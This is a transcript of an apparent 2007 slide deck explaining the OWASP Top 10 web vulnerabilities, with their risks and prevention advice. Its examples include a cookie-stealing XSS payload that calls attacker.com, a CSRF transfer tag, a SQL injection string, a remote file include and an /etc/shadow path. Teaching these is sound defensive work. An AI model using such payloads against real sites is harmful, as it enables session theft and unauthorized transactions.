OWASP - Top 10

OWASP Top 10 (2007) Brett Hardin OWASP Top 10 -
Brett Hardin

Contact Information ¤ http://bretthard.in ¤ @miscsecurity OWASP Top 10 - Brett Hardin

What is the OWASP Top 10? ¤  10 web application
vulnerabilities ¤  Allows organizations to have insight into why their applications have vulnerabilities ¤  Aids in understanding the consequences ¤  Good starting point to implement a secure coding strategy ¤  Not a standard! OWASP Top 10 - Brett Hardin

What is the need for Application Security? ¤  75% of
attacks target the application and not infrastructure – Gartner ¤  Attack surface is huge [millions of lines of code] ¤  A single vulnerability can lead to catastrophic failure ¤  Network controls do nothing to stop application attacks OWASP Top 10 - Brett Hardin

How was it Developed? ¤  The OWASP top 10 is
constructed from the MITRE vulnerability trends for 2006 ¤  Only focused on vulnerabilities that affect web applications ¤  Exception is cryptographic vulnerabilities ¤  Represent root cause of many privacy leaks and compliance issues (PCI) ¤  Focus is on vulnerabilities not attacks OWASP Top 10 - Brett Hardin

Overview ¤  Cross-Site Scripting (XSS) ¤  Injection Flaws ¤  Malicious
File Execution ¤  Insecure Direct Object Reference ¤  Cross Site Request Forgery ¤  Information Leakage and Improper Error Handling ¤  Broken Authentication and Session Management ¤  Insecure Cryptographic Storage ¤  Insecure Communications ¤  Failure to Restrict URL Access OWASP Top 10 - Brett Hardin

A10 - Failure to Restrict URL Access OWASP Top 10
- Brett Hardin

A10 – Failure to Restrict URL Access Vulnerability: ¤  Having
a page that doesn`t have the correct access control policy in place. ¤  Having a page that is lhiddenz from the users. ¤  Pages that check privileges on the client but not on the server ¤  Attackers find these pages through forceful browsing. ¤  Susceptible Pages could follow out of date access control policies. OWASP Top 10 - Brett Hardin

A10 – Failure to Restrict URL Access /Customer OWASP Top
10 - Brett Hardin

A10 – Failure to Restrict URL Access /Customer balance.jsp transfer.jsp
OWASP Top 10 - Brett Hardin

A10 – Failure to Restrict URL Access approveTransfer.jsp /Customer balance.jsp
transfer.jsp OWASP Top 10 - Brett Hardin

addUser.jsp A10 – Failure to Restrict URL Access approveTransfer.jsp /Customer
balance.jsp transfer.jsp /Admin OWASP Top 10 - Brett Hardin

A10 – Failure to Restrict URL Access ¤  Business Risk
¤  Exposes functionality to unauthorized users ¤  Loss of a record trail ¤  Can potentially bypass session management ¤  Prevents good auditing from taking place OWASP Top 10 - Brett Hardin

A10 – Failure to Restrict URL Access ¤  Prevention ¤ 
Careful planning ¤  Do not assume users will be unaware of hidden functionality ¤  Block access to all file types that your application doesn`t serve ¤  Create an access control matrix ¤  Should be created for every URL and business function OWASP Top 10 - Brett Hardin

Is the User Authorized if(Session[lisLoggedInz] == false) { //redirect to
the login page } else { if(check_user_access(Session[luseridz], lPageNamez) { //display content } else { //redirect to home } } OWASP Top 10 - Brett Hardin

A9 – Insecure Communications OWASP Top 10 - Brett Hardin

A9 – Insecure Communications ¤  Vulnerability: ¤  Failure to secure
sensitive transactions ¤  Not securing client-to-server connections ¤  Not securing server-to-database connections ¤  Not securing other back end connections that pass sensitive data. OWASP Top 10 - Brett Hardin

A9 – Insecure Communications OWASP Top 10 - Brett Hardin

A9 – Insecure Communications CC# OWASP Top 10 - Brett
Hardin

A9 – Insecure Communications CC# CC# OWASP Top 10 -
Brett Hardin

A9 – Insecure Communications ¤  Business Risk ¤  Interception of
sensitive transactions ¤  Complete confidentiality loss ¤  Can`t trust the information being sent is lsecurez ¤  Complete integrity loss ¤  Can`t trust the information received is lsecurez OWASP Top 10 - Brett Hardin

A9 – Insecure Communications ¤  Prevention: ¤  Use SSL to
encrypt network traffic from the client to the server. ¤  Encrypt backend connections, such as database connections. OWASP Top 10 - Brett Hardin

A8 – Insecure Cryptographic Storage OWASP Top 10 - Brett
Hardin

A8 – Insecure Cryptographic Storage ¤  Vulnerability: ¤  Not encrypting
sensitive information ¤  If it`s sensitive and stored it needs to be encrypted. ¤  Examples of sensitive items include: ¤  Credit cards ¤  passwords ¤  User data? OWASP Top 10 - Brett Hardin

A8 – Insecure Cryptographic Storage ¤  Business risk ¤  Regulatory
issues ¤  PCI-DSS (Requirement 3) ¤  Confidentiality loss ¤  Data protection OWASP Top 10 - Brett Hardin

A8 – Insecure Cryptographic Storage ¤  Prevention: ¤  Don`t create
your own cryptographic algorithms (homegrown) ¤  Don`t use weak algorithms (RC3,RC4, MD5, SHA-1) ¤  Generate and store private keys with care ¤  Ensure encrypted data stored is not easy to decrypt OWASP Top 10 - Brett Hardin

A7 – Broken Authentication and Session Management OWASP Top 10
- Brett Hardin

A7 – Broken Authentication and Session Management ¤  Vulnerability ¤ 
Failure to protect credentials ¤  User login from an unencrypted page ¤  Password reset enumeration ¤  Password/username sent in email ¤  Failure to protect session tokens ¤  Session tokens used in the URL ¤  Session tokens stored persistently in a cookie ¤  Session timeouts are too long OWASP Top 10 - Brett Hardin

A7 – Broken Authentication and Session Management ¤  Business Risk
¤  Account hijacking ¤  Undermines authorization ¤  Breaks accountability controls ¤  Potential privacy violations OWASP Top 10 - Brett Hardin

A7 – Broken Authentication and Session Management ¤  Prevention ¤ 
Relies upon protection from Secure Communication (A9) and Cryptographic Storage (A8) ¤  DO NOT write your own session handlers! ¤  Applications should rely on robust well proven SSO or authentication systems ¤  DO NOT allow login from an unencrypted page ¤  Serve new session cookies after successful authentication ¤  Use timeouts for inactive sessions ¤  Verify the current password when using change password functionality OWASP Top 10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling OWASP Top
10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling ¤  Vulnerability:
¤  Unintentionally leaking information about configuration or internal workings ¤  Leaking internal state ¤  Revealing debug information to users ¤  Examples: ¤  Stack traces ¤  Failed SQL statements ¤  Path information ¤  Debug information OWASP Top 10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling OWASP Top
10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling ¤  Business
Risk ¤  Fingerprinting servers ¤  Displaying errors can potentially lead to additional compromise ¤  SQL injection error messages can lead to Injection Flaws (A2) OWASP Top 10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling ¤  Prevention
¤  Suppress errors from users (Log them instead) ¤  Create a custom error handler ¤  Use a standard exception handling architecture ¤  Aids in different HTTP error codes from being returned ¤  Potentially use random / unique error codes ¤  Development team should use a common approach ¤  Various layers (database) may also return exceptions ¤  Overriding error codes with 200 OK OWASP Top 10 - Brett Hardin

A6 – Information Leakage and Improper Error Handling import java.util.logging.Logger;
try { //main block of code } catch (InterException e) { //handle exception Logger.getLogger(lLogNamez).log(Level.SEVERE, null, ex); } catch (Exception e) { //process the global exception } OWASP Top 10 - Brett Hardin

A5 – Cross Site Request Forgery (CSRF) OWASP Top 10
- Brett Hardin

A5 – Cross Site Request Forgery (CSRF) ¤  Vulnerability ¤ 
Forces the victim`s browser to send a request to another established application`s session. ¤  The code is often not on the site which suffers from the vulnerability ¤  Exploits the trust a site has with the browser. ¤  WIDESPREAD! (Sleeping Giant) OWASP Top 10 - Brett Hardin

- Brett Hardin Banksite.com

- Brett Hardin Banksite.com Badwebsite.com

- Brett Hardin Banksite.com Badwebsite.com <img src="http://banksite.com/transfer?to_acct=4455&amt=1000">

- Brett Hardin Banksite.com Badwebsite.com

A5 – Cross Site Request Forgery (CSRF) ¤  Business Risk
¤  Breaks authentication mechanisms ¤  Authorized transactions aren`t authorized ¤  Destroys record trails ¤  Prevents good auditing OWASP Top 10 - Brett Hardin

- Brett Hardin

A5 – Cross Site Request Forgery (CSRF) ¤  Prevention ¤ 
Require authentication on GET/POST ¤  Use custom random tokens when making sensitive transactions ¤  Verify the submitted token is correct for the current user. ¤  Have adequate timeout`s for sessions ¤  In addition, check HTTP referrer header ¤  Check for crossdomain.xml files - flash OWASP Top 10 - Brett Hardin

A4 – Insecure Direct Object Reference OWASP Top 10 -
Brett Hardin

A4 – Insecure Direct Object Reference ¤  Vulnerability: ¤  Exposes
a reference to an internal implementation object ¤  Database record ¤  Internal URL ¤  File ¤  Attacker modifies the direct object to access other objects OWASP Top 10 - Brett Hardin

A4 – Insecure Direct Object Reference displayReport.jsp OWASP Top 10
- Brett Hardin /files/report.txt

A4 – Insecure Direct Object Reference displayReport.jsp /etc/shadow OWASP Top
10 - Brett Hardin /files/report.txt

A4 – Insecure Direct Object Reference Open Redirect OWASP Top
10 - Brett Hardin

A4 – Insecure Direct Object Reference OWASP Top 10 -
Brett Hardin

A4 – Insecure Direct Object Reference ¤  Business risk ¤ 
Confidentiality loss ¤  Integrity loss ¤  Access data owned by other users ¤  Useful in phishing attacks OWASP Top 10 - Brett Hardin

A4 – Insecure Direct Object Reference ¤  Prevention ¤  Use
indirect reference maps ¤  Direct maps can be easily guessed ¤  Avoid exposing private objects to users ¤  If a direct object must be used ¤  Ensure the user is authorized to view the object ¤  Validate private objects with an laccept known goodz approach OWASP Top 10 - Brett Hardin

A4 – Insecure Direct Object Reference Code Example: $sql =
lSELECT * FROM accounts WHERE account_number = l + $safe_request[laccount_numberz]; OWASP Top 10 - Brett Hardin

A4 – Insecure Direct Object Reference Example of Authorizing Access
to Data: $sql = lSELECT * FROM accounts WHERE account_number = l + $safe_request[laccount_numberz] + lAND user_id = l + $authenticated_data[luser_idz]; OWASP Top 10 - Brett Hardin

A3 – Malicious File Execution OWASP Top 10 - Brett
Hardin

A3 – Malicious File Execution ¤  Vulnerability: ¤  Takes user
input and appends it to a file stream function. ¤  File upload functionality OWASP Top 10 - Brett Hardin

A3 – Malicious File Execution Client Vulnerable Server Malicious Server

OWASP Top 10 - Brett Hardin load $_request[“filename”];

OWASP Top 10 - Brett Hardin load $_request[“http://offsite.com/haxor.php”];

A3 – Malicious File Execution Code Example: String requestURI =
request.getRequestURI(); File file = new File(l/home/usernamez, requestURI); ServletOutputStream out = response.getOutputStream(); FileInputStream fileStream = new FileInputStream(file); byte[] buf = new byte[fileStream.available()]; fileStream.read(buf); outstream.write(buf); OWASP Top 10 - Brett Hardin

A3 – Malicious File Execution ¤  Business Risk: ¤  Allows
malicious content to execute on web application server ¤  Potentially Compromise the Server OWASP Top 10 - Brett Hardin

A3 – Malicious File Execution ¤  Prevention: ¤  Don`t allow
users to insert into server-based resources ¤  Strongly validate input using an laccept known goodz policy ¤  Add firewall rules to prevent applications from making new outbound connections ¤  Implement a sandbox to isolate applications from one another ¤  JVM security manager has been enabled OWASP Top 10 - Brett Hardin

A2 – Injection Flaws OWASP Top 10 - Brett Hardin

A2 – Injection Flaws ¤  Vulnerability ¤  When user supplied
data is sent to an interpreter as part of a command or query. ¤  Vulnerability that lbreaksz out of the intended context. ¤  Types of injection flaws: ¤  SQL injection ¤  XML injection ¤  LDAP injection ¤  XPATH injection OWASP Top 10 - Brett Hardin

A2 – Injection Flaws ¤  Business risk: ¤  Injection flaws
allow an attacker to: ¤  create new db entries ¤  Read db entries ¤  Update db records ¤  delete any arbitrary data available to the application. OWASP Top 10 - Brett Hardin

A2 – Injection Flaws ¤  Example: ¤  Db_query = lselect
* from users where username =bz + username + l`z; ¤  User inserts, Brett ¤  Db_query = lselect * from users where username =bBrett`z; OWASP Top 10 - Brett Hardin

A2 – Injection Flaws ¤  Example: ¤  Db_query = lselect
* from users where username =bz + username + l`z; ¤  Attacker inserts X` or b1`=b1 ¤  Db_query = lselect * from users where username = bX` or b1`=b1`z); OWASP Top 10 - Brett Hardin

A2 – Injection Flaws ¤  Prevention: ¤  Prepared Statement ¤ 
Separates SQL logic from supplied data ¤  Validate your input ¤  Use a laccept known goodz strategy. ¤  Then sanitize (Encode/Escape) your input ¤  Convert dangerous characters to their non-dangerous counterparts. (e.g. single quote (b) becomes %27) OWASP Top 10 - Brett Hardin

A2 – Injection Flaws PreparedStatement statement = databaseConnection.getPreparedStatement(); String sql
= lSELECT * FROM users WHERE username = ?z; statement.setString(1, encode(requestParameter)); statement.execute(); OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) OWASP Top 10 -
Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  Vulnerability ¤  XSS
is a type of HTML injection. ¤  XSS allows a user to insert client side scripting into a page that will be displayed back to the user. ¤  XSS exploits the trust a user has with a site. ¤  Extremely common and simple for attackers to find OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  Consider the output
of /helloworld.cgi?name=BOB <HTML> <BODY> Hello BOB </BODY> </HTML> OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT
SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello <SCRIPT SRC=bhttp:// attacker.com/`+document.cookie></SCRIPT> </BODY> </HTML> OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  What about? /helloworld.cgi?name=<SCRIPT
SRC=bhttp://attacker.com/`+document.cookie></ SCRIPT> <HTML> <BODY> Hello <SCRIPT SRC>="http:// attacker.example.com/" +document.cookie</ SCRIPT> </BODY> </HTML> OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  Business Risk ¤ 
XSS allows attacker to insert code into your application and present it to users on your behalf. ¤  Port-scan intranet ¤  Steal credentials ¤  Steal browser history ¤  Abuse browser vulnerabilities ¤  Log keystrokes ¤  Steal cookies ¤  lDefacez websites OWASP Top 10 - Brett Hardin

A1 – Cross Site Scripting (XSS) www.trustedbank.com OWASP Top 10
- Brett Hardin

A1 – Cross Site Scripting (XSS) OWASP Top 10 -
Brett Hardin

A1 – Cross Site Scripting (XSS) ¤  Prevention: ¤  Strong
output encoding/escaping ¤  Additionally: output validation ¤  Additionally: input validation OWASP Top 10 - Brett Hardin

Important! ¤  No lweb applicationz scanner will be able to
find all of the vulnerabilities in the OWASP Top 10. ¤  Developers should be fully versed in the OWASP Top 10 ¤  Prevents new code from being developed insecurely ¤  Have code reviews ¤  Hire a developer to specifically look at code from a security perspective OWASP Top 10 - Brett Hardin

Repeat After Me Don`t Trust User Input, All User Input
is Malicious! OWASP Top 10 - Brett Hardin

Summary ¤  To prevent these vulnerabilities from occurring in your
application, you need to introduce the OWASP Top 10 to your developers. ¤  An ounce of prevention is worth a pound of cure. ¤  Benjamin Franklin OWASP Top 10 - Brett Hardin

Contact Information ¤ http://bretthard.in ¤ @miscsecurity OWASP Top 10 - Brett Hardin

OWASP - Top 10

OWASP - Top 10

More Decks by Brett Hardin

Other Decks in Programming

Featured

Transcript